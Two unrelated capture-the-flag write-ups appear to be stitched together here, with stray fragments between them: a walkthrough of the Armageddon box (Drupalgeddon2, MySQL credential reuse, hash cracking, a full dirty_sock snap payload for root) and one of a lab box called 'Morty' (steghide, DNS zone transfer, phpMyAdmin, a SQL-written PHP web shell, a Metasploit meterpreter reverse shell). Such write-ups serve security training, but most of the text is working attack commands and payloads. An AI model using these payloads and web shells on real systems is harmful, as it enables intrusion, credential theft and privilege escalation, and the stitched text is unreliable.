Introduction@Armageddon:~$

Pwned

➜  armageddon git:(master) ✗ ssh root@armageddon.htb                                                                                                  root@armageddon.htbWelcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-26-generic x86_64)                                                                                                                                                                                                                            System information as of Thu 21 May 2020 06:11:30 AM UTC                                                                                                                                                                                                                                                    System load:                      0.07                                                                                                                Usage of /:                       46.0% of 15.68GB                                                                                                    Memory usage:                     13%                                                                                                                 Swap usage:                       0%                                                                                                                  Processes:                        218                                                                                                                 Users logged in:                  2                                                                                                                   IPv4 address for br-836575a2ebbb: 172.20.0.1                                                                                                          IPv4 address for br-8ec6dcae5ba1: 172.30.0.1                                                                                                          IPv4 address for docker0:         172.17.0.1                                                                                                          IPv4 address for eth0:            10.10.10.233                                                                                                                                                                                                                                                            Last login: Thu May 21 06:11:12 2020 from 10.10.XX.XX                                                                                                 

Recon

Nmap

┌───[us-free-1]─[10.10.14.81]─[root@parrot]─[~/Desktop/HTB/Armageddon]
└──╼ [★]$ nmap -sC -sV -oA nmap/result 10.10.10.233
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-28 08:57 CDT
Nmap scan report for 10.10.10.233
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
|   256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_  256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to  Armageddon |  Armageddon

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.55 seconds

So basically Two ports are opened 22:ssh 80:http

Port-80

There is a simple login page.

Let’s check the source code for some juicy stuff.

I found the drupal version "Drupal 7".

Let’s search on google for exploit for this specific version.

Found a rapid7 page

Link : Drupal Drupalgeddon 2 Forms API Property Injection

Let’s try this real quick.

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
msf6 exploit(drupal_drupalgeddon2) > options
    ...options...
msf6 exploit(drupal_drupalgeddon2) > set rhosts 10.10.10.233
msf6 exploit(drupal_drupalgeddon2) > set lhost tun0
    ...show and set options...
msf6 exploit(drupal_drupalgeddon2) > run

We got the shell.

Now let’s enumerate some good stuff.

I found an interesting file called settings.php inside /var/www/html/sites/default/ directory. which has contain mysql creads.

$databases = array (  
  'default' =>      
 array (
  'default' =>     
  array (
    'database' => 'drupal',
    'username' => 'drupaluser',
    'password' => 'CQHEy@9M*m23gBVj',
    'host' => 'localhost',
    'port' => '',
    'driver' => 'mysql',
    'prefix' => '',            
   ),                             
 ),                               
);

But before connect to the mysql let’s spawn a stable shell first.

python3 tty shell doesn’t spawn So let’s try connect with mysql without tty shell.

$ mysql -u drupaluser -h localhost -pCQHEy@9M*m23gBVj
/bin/sh: line 1: snip: No such file or directory

It’s giving us error so let’s try another command of mysql.

$ mysql -u drupaluser -pCQHEy@9M*m23gBVj -e 'show databases;'
Database
information_schema
drupal
mysql
performance_schema

It’s work let’s fetch the tables inside drupal database.

$ mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'show tables;'
Tables_in_drupal
actions
authmap
batch
block
block_custom
block_node_type
block_role
blocked_ips
cache
cache_block
cache_bootstrap
cache_field
cache_filter
cache_form
cache_image
cache_menu
cache_page
cache_path
comment
date_format_locale
date_format_type
date_formats
field_config
field_config_instance
field_data_body
field_data_comment_body
field_data_field_image
field_data_field_tags
field_revision_body
field_revision_comment_body
field_revision_field_image
field_revision_field_tags
file_managed
file_usage
filter
filter_format
flood
history
image_effects
image_styles
menu_custom
menu_links
menu_router
node
node_access
node_comment_statistics
node_revision
node_type
queue
rdf_mapping
registry
registry_file
role
role_permission
search_dataset
search_index
search_node_links
search_total
semaphore
sequences
sessions
shortcut_set
shortcut_set_users
system
taxonomy_index
taxonomy_term_data
taxonomy_term_hierarchy
taxonomy_vocabulary
url_alias
users
users_roles
variable
watchdog

Now let’s dump the username and hashes inside users table.

$ mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'select name,pass from users;'

brucetherealadmin    $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
Voker2311    $S$DuD4Cx2wTstu7dRMFAEXc7Q9JYG85eHz.HcmfCXUTkf67F.BH8PU
ass    $S$Dl3WTyURFuIIM.Krf4zhGeZ7ff2YHvDqClfWEgSSBD.DsKu5GgkA
jack    $S$DoWsI1wuysJEhpRrnYoUS4Yr2UebZ.LJD9TY6y0/2RdRqfzSFjCa
joe    $S$D0MvcWAUp83MLoFhhLNChPf8RfxmlwRQNl7MExhWVeqbnUavoXdY

Now we have the hashes let’s try to crack it.

┌───[us-free-1]─[10.10.14.81]─[root@parrot]─[~/Desktop/HTB/Armageddon]
└──╼ [★]$ vim hash
┌───[us-free-1]─[10.10.14.81]─[root@parrot]─[~/Desktop/HTB/Armageddon]
└──╼ [★]$ john hash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
booboo           (?)

We got the password for brucetherealadmin:booboo

Let’s ssh in real quick and get the user.txt.

┌───[us-free-1]─[10.10.14.81]─[root@parrot]─[~/Desktop/HTB/Armageddon]
└──╼ [★]$ ssh brucetherealadmin@10.10.10.233
The authenticity of host '10.10.10.233 (10.10.10.233)' can't be established.
ECDSA key fingerprint is SHA256:bC1R/FE5sI72ndY92lFyZQt4g1VJoSNKOeAkuuRr4Ao.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.233' (ECDSA) to the list of known hosts.
brucetherealadmin@10.10.10.233's password: booboo
Last failed login: Mon Mar 29 03:08:40 BST 2021 from 10.10.16.35 on ssh:notty
There was 1 failed login attempt since the last successful login.
Last login: Mon Mar 29 02:57:31 2021 from 10.10.14.209
[brucetherealadmin@armageddon ~]$ cat user.txt 
ffd28820484e213e19034669c32481c6
[brucetherealadmin@armageddon ~]$

Privilege escalation

Before running linpeas let’s try manually first.

$ sudo -l

Let’s google it for Privilege escalation.

Link : Privilege Escalation in Ubuntu Linux (dirty_sock exploit)

Link : dirty_sock: Linux Privilege Escalation (via snapd)

This github python script doesn’t work in this case so in this script we only need the base64 string and then we decode the base64 string and save it in file.

[brucetherealadmin@armageddon tmp]$ python2 -c 'print "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A"*4256 + "=="' | base64 -d > dedsec.snap
[brucetherealadmin@armageddon tmp]$ ls
dedsec.snap  systemd-private-1d39dfc07f4144c891b3f86f79a82b7e-httpd.service-OGHVm9  systemd-private-1d39dfc07f4144c891b3f86f79a82b7e-mariadb.service-692MD3  vmware-root_674-2731152261
[brucetherealadmin@armageddon tmp]$ sudo /usr/bin/snap install --devmode dedsec.snap 
dirty-sock 0.1 installed
[brucetherealadmin@armageddon tmp]$ su dirty_sock
Password: dirty_sock
[dirty_sock@armageddon tmp]$ sudo -i 

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for dirty_sock: dirty_sock
[root@armageddon ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@armageddon ~]# cat root.txt 
785fca2a581bedfe2cc519b4cff3dcb9
You have new mail in /var/spool/mail/root
[root@armageddon ~]#

Imp : If you can’t "su dirty_sock" reset the box and try again in my case it’s work in second time.

And we pwned it …….

If u liked the writeup.Support a Student to Get the OSCP-Cert Donation for OSCP

Resources

.

Hash -> OhKUwkvR$.uL.mlYJOz.ubK/FmXouGbU7vCVCG9s00K7R.ny9ryM.vXNdwZhOGCcq7e3XcbA5UpqUp.9eKY4hfLy9m5aU7/

.

.

┌─[✗]─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $cat allports.nmap 
# Nmap 7.91 scan initiated Fri Mar 5 15:11:41 2021 as: nmap -A -oN allports.nmap 10.150.150.57
Nmap scan report for mortysserver.com (10.150.150.57)
Host is up (0.031s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 3072 e8:60:09:66:aa:1f:e8:76:d8:84:16:18:1c:e4:ee:32 (RSA)
| 256 92:09:d3:0e:f9:47:48:03:9f:32:9f:0f:17:87:c2:a4 (ECDSA)
|_ 256 1d:d1:b3:2b:24:dc:c2:8a:d7:ca:44:39:24:c3:af:3d (ED25519)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid: 
|_ bind.version: 9.16.1-Ubuntu
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 5 15:11:58 2021 -- 1 IP address (1 host up) scanned in 16.41 seconds
┌─[user@parrot-virtual]─[~/ptd/morty]

.

┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $curl http://10.150.150.57/note.html
Morty, <br>
if you read this: I've already configured your domain 'mortysserver.com' on this server, don't bother me with it anymore!!
<br>
-Rick 
┌─[user@parrot-virtual]─[~/ptd/morty]

.add  10.150.150.57 mortyserver to /etc/hosts

┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $cat secret.txt 
Fl4sk#!
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $md5sum screen.jpeg
df7eb9983c329c32408c5a6be270b3f1  screen.jpeg
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $steghide --info screen.jpeg
"screen.jpeg":
format: jpeg
capacity: 10.4 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
embedded file "keytotheuniverse.txt":
size: 24.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $steghide extract -sf screen.jpeg 
Enter passphrase: Fl4sk#!
wrote extracted data to "keytotheuniverse.txt".
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $ls -la
total 212
drwxr-xr-x 1 user user 108 Mar 11 11:12 .
drwxr-xr-x 1 user user 2164 Mar 5 15:10 ..
-rw-r--r-- 1 user user 1016 Mar 5 15:11 allports.nmap
-rw-r--r-- 1 user user 24 Mar 11 11:12 keytotheuniverse.txt
-rw-r--r-- 1 user user 204432 Mar 8 09:32 screen.jpeg
-rw-r--r-- 1 user user 9 Mar 11 11:11 secret.txt
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $cat keytotheuniverse.txt 
rick:WubbaLubbaDubDub1!

.

┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $dig axfr @10.150.150.57

; <<>> DiG 9.16.8-Debian <<>> axfr @10.150.150.57
; (1 server found)
;; global options: +cmd
;; Query time: 33 msec
;; SERVER: 10.150.150.57#53(10.150.150.57)
;; WHEN: Fri Mar 12 11:46:00 GMT 2021
;; MSG SIZE rcvd: 56

┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $dig axfr @10.150.150.57 mortysserver.com

; <<>> DiG 9.16.8-Debian <<>> axfr @10.150.150.57 mortysserver.com
; (1 server found)
;; global options: +cmd
mortysserver.com. 900 IN SOA 10.150.150.57. email.mortysserver.com. 1 900 900 604800 900
mortysserver.com. 900 IN NS 10.150.150.57.
rickscontrolpanel.mortysserver.com. 900 IN A 10.150.150.57
mortysserver.com. 900 IN SOA 10.150.150.57. email.mortysserver.com. 1 900 900 604800 900
;; Query time: 29 msec
;; SERVER: 10.150.150.57#53(10.150.150.57)
;; WHEN: Fri Mar 12 11:47:13 GMT 2021
;; XFR size: 4 records (messages 1, bytes 212)

┌─[user@parrot-virtual]─[~/ptd/morty]

We add to our /etc/hosts : 10.150.150.57 mortysserver.com rickscontrolpanel.mortysserver.com email.mortysserver.com

.

We access http://rickscontrolpanel.mortysserver.com

and find FLAG1=921e4db975bda77543cfe83fbe176d15e09ce7e2

We logon to this phpmyadmin site as rick:WubbaLubbaDubDub1!

and find

FLAG2=e39c995fbf614c5c38ca7343f59cc310e5880251

.

in phpmyadmin create database 1st, then execute query :

 SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/backdoor.php"

.

we get

Error

SQL query: Documentation

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/backdoor.php"

MySQL said: Documentation
#1 - Can't create/write to file '/var/www/backdoor.php' (Errcode: 13 "Permission denied")

.So we can’t write there ( writing in \tmp is allowed )

.

.

SELECT LOAD_FILE (‘/etc/passwd’);

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin 
sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin
apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin 
pollinate:x:110:1::/var/cache/pollinate:/bin/false sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
morty:x:1000:1000:Morty Smith:/home/morty:/bin/bash 
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false bind:x:112:118::/var/cache/bind:/usr/sbin/nologin
mysql:x:113:119:MySQL Server,,,:/nonexistent:/bin/false

wappalyzer shows phpmyadmin = version 4.8.1

We can then use https://medium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8e#:~:text=from%20PMA%204.8.-,0%20~%204.8.,PHP%20code%20on%20the%20server

or use metesploit module : multi/http/phpmyadmin_lfi_rce

msf6 exploit(multi/http/phpmyadmin_lfi_rce) > show options

Module options (exploit/multi/http/phpmyadmin_lfi_rce):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD WubbaLubbaDubDub1! no Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.150.150.57 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base phpMyAdmin directory path
USERNAME rick yes Username to authenticate with
VHOST rickscontrolpanel.mortysserver.com no HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.66.66.42 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic

msf6 exploit(multi/http/phpmyadmin_lfi_rce) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.66.66.42:4444 
msf6 exploit(multi/http/phpmyadmin_lfi_rce) > [*] Sending stage (39282 bytes) to 10.150.150.57
[*] Meterpreter session 1 opened (10.66.66.42:4444 -> 10.150.150.57:42974) at 2021-03-13 14:58:15 +0000

msf6 exploit(multi/http/phpmyadmin_lfi_rce) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information            Connection
  --  ----  ----                   -----------            ----------
  1         meterpreter php/linux  www-data (33) @ morty  10.66.66.42:4444 -> 10.150.150.57:42974 (10.150.150.57)

msf6 exploit(multi/http/phpmyadmin_lfi_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 9802 created.
Channel 0 created.


cd user/morty

cat FLAG3.txt
73ce6cecfc1109f1e43d379fd9922dcc699af321

Later found the i could write to

echo '<?php system($_GET['cmd']); ?>' > shell.php
pwd
/var/www/html/rickscontrolpanel/public_html/phpmyadmin

and then access

http://rickscontrolpanel.mortysserver.com/shell.php?cmd=whoami

Author : Puckiestyle